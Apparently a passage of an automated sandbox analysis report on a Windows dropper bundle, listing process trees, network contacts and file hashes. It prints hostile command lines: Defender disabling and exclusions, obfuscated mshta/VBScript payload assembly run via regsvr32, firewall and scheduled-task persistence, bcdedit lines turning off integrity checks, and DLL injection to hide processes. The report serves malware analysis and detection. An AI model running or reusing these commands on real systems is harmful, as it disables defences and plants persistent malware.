PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe

"C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon166dc6040fb8726.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16bd4a93b822a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1661118952.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16b7581baf7.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon167f9db638e4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16ad13d7ad1b02.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1618e4439d986270.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1631358b82299bd8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16d070a064013c841.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe

Mon166dc6040fb8726.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16734014a69dec.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16737798ac26f984.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon164c5af508c3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16957e622fa390.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16ac385cfd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16e127a54386dd68.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon161bd381a14aea5c.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe

Mon16734014a69dec.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe

Mon164c5af508c3.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe

Mon16ac385cfd.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe

Mon16d070a064013c841.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe

Mon161bd381a14aea5c.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1618e4439d986270.exe

Mon1618e4439d986270.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe

Mon1661118952.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe

Mon16b7581baf7.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe

Mon167f9db638e4.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe

Mon1631358b82299bd8.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe

Mon16bd4a93b822a.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe

Mon16737798ac26f984.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe

Mon16e127a54386dd68.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe

Mon16957e622fa390.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF """" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"" ) do taskkill -IM ""%~nXc"" -F " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp

"C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp" /SL5="$50232,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe"

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe

"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe" -u

C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp

"C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp" /SL5="$501F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe"

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe

"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp" /SL5="$601F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "" == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe" ) do taskkill -IM "%~nXc" -F

C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE

WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG

C:\Windows\SysWOW64\taskkill.exe

taskkill -IM "Mon1661118952.exe" -F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF ""/PBIzjiz3UWH4ATMXBTQCoG "" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"" ) do taskkill -IM ""%~nXc"" -F " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "/PBIzjiz3UWH4ATMXBTQCoG " == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE" ) do taskkill -IM "%~nXc" -F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIPt:cLoSe ( creaTEOBJEcT ( "wsCRipt.SheLL" ). RUN( "C:\Windows\system32\cmd.exe /q /c ECho | set /P = ""MZ"" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 + TFQUjJ.N + USE8pS.0rL + PeLOUZb0.jKJ + N6O00.K + B6Oj.Xh + K30Q.Qo AGKPq.W & sTarT regsvr32 -s aGKpQ.W " , 0 , TrUe ) )

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /c ECho | set /P = "MZ" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 + TFQUjJ.N + USE8pS.0rL + PeLOUZb0.jKJ + N6O00.K + B6Oj.Xh + K30Q.Qo AGKPq.W & sTarT regsvr32 -s aGKpQ.W

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECho "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>NWHPW.hX5"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 -s aGKpQ.W

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241106104111.log C:\Windows\Logs\CBS\CbsPersist_20241106104111.cab

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1326065463-17732016232079665164538795616749644004-1611431629-1021433569-552968636"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe

"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe"

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Program Files (x86)\Gparted\Build.sfx.exe

"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1

C:\Program Files (x86)\Gparted\Build.exe

"C:\Program Files (x86)\Gparted\Build.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1739371705716997079-3753041-21431654931733133288-1560707188-21284361101814353396"

C:\Program Files (x86)\Gparted\gimagex.exe

"C:\Program Files (x86)\Gparted\gimagex.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /306-306

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "410733652-792252731-15552243301337362575265087720-19596527081131691164-1956904596"

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 1672

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
FR 212.193.30.45:80 212.193.30.45 tcp
FR 212.193.30.45:443 tcp
FR 212.193.30.45:443 tcp
FR 212.193.30.29:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 tweakballs.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 54.84.177.46:443 www.listincode.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 webdatingcompany.me udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 buy-fantasy-gxmes.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
FR 91.121.67.60:51630 tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
DE 212.192.241.62:80 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
US 8.8.8.8:53 www.google.com udp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
FR 91.121.67.60:51630 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
US 8.8.8.8:53 trumops.com udp
US 8.8.8.8:53 retoti.com udp
US 8.8.8.8:53 logs.trumops.com udp
US 8.8.8.8:53 logs.retoti.com udp
US 8.8.8.8:53 www.yahoo.com udp
US 8.8.8.8:53 f5b086b2-fc5a-46c5-b748-f39ef0e7356e.uuid.trumops.com udp
US 8.8.8.8:53 server14.trumops.com udp
US 44.221.84.105:443 server14.trumops.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
FI 135.181.79.37:10902 tcp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.21:443 bitbucket.org tcp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
US 72.84.118.132:8080 tcp
FR 91.121.67.60:51630 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
US 72.84.118.132:8080 tcp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:51630 tcp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 dumancue.com udp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:51630 tcp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:51630 tcp
FI 135.181.79.37:10902 tcp
FI 135.181.129.119:4805 tcp
US 44.221.84.105:443 server14.trumops.com tcp
FI 135.181.79.37:10902 tcp

Files

\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe

MD5 0c0e1a604e0da52b76b20bc2adba8192
SHA1 c6df017caaebdfbf3d86b022570aeb6c2cee1f3a
SHA256 a8e57cdcd0fa1640cde72c232cd5c3b07be08f2ac5ed88d78dcc93b627c935e2
SHA512 797568375efa0902493cadffa79ad0638a34d3cda2ae961557fe9c77c463a9ffd4a40695464aeaf19a3be7f29c085538e0e1eaac52e7c15a1de95b2db2621d8e

\Users\Admin\AppData\Local\Temp\7zS47BF0566\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/2860-60-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS47BF0566\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2860-64-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2860-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2860-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2860-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2860-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2860-82-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2860-81-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2860-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe

MD5 4f11e641d16d9590ac1c9f70d215050a
SHA1 75688f56c970cd55876f445c8319d7b91ce556fb
SHA256 efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
SHA512 b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1618e4439d986270.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe

MD5 999cfa89375bc54358907287d1fc7462
SHA1 7e67a8f2161e36da1d26a5bc3dc70eb00f313345
SHA256 e74473a1edde3b073d2242d2efaa98bf548ab71a8515110a05f39a9f6a0ae69a
SHA512 169df388945cef468b88e1e963c68a2fae62e6ec238d53c8aaf6712e75789a6c94673f7c338ad5de42d4a6733f9919e7d7b7d087c5e94514479c1e85e8153b65

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe

MD5 83a0d323899ff2f761f434dc017900ba
SHA1 a44010a7d098a737f30ea04d280502d99718b18d
SHA256 b90fd0244165858b4b4d1390f039731fbce2730a7482588f13e66e52e20fe124
SHA512 40b268d0c1181ea950f4f7b3fa3bf10bcb84330047657ba2c1adec4c4e5f99b24d988086730bdebe3176e8e2d26fe841a4feaf9376c0d002fdb77291e97f7f6e

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe

MD5 3ede4ea9236fb79e46017591d7fa89ba
SHA1 a064bb878b2d4f136dadeb061f7321bfc617355b
SHA256 e41420775c1b48d6c59060a40002802bfd41195368c9c30130ce9ad83bb3f169
SHA512 7a7acce6cd4a8801885336d0dd5100ed3c925f9676c77c7192c7c54bc010dbb8cbc9e9b03bdba1ac6125f3139ab1a5d363cbab00b68b8b97ff6647a9cc5df434

memory/2860-109-0x000000006FE40000-0x000000006FFC6000-memory.dmp

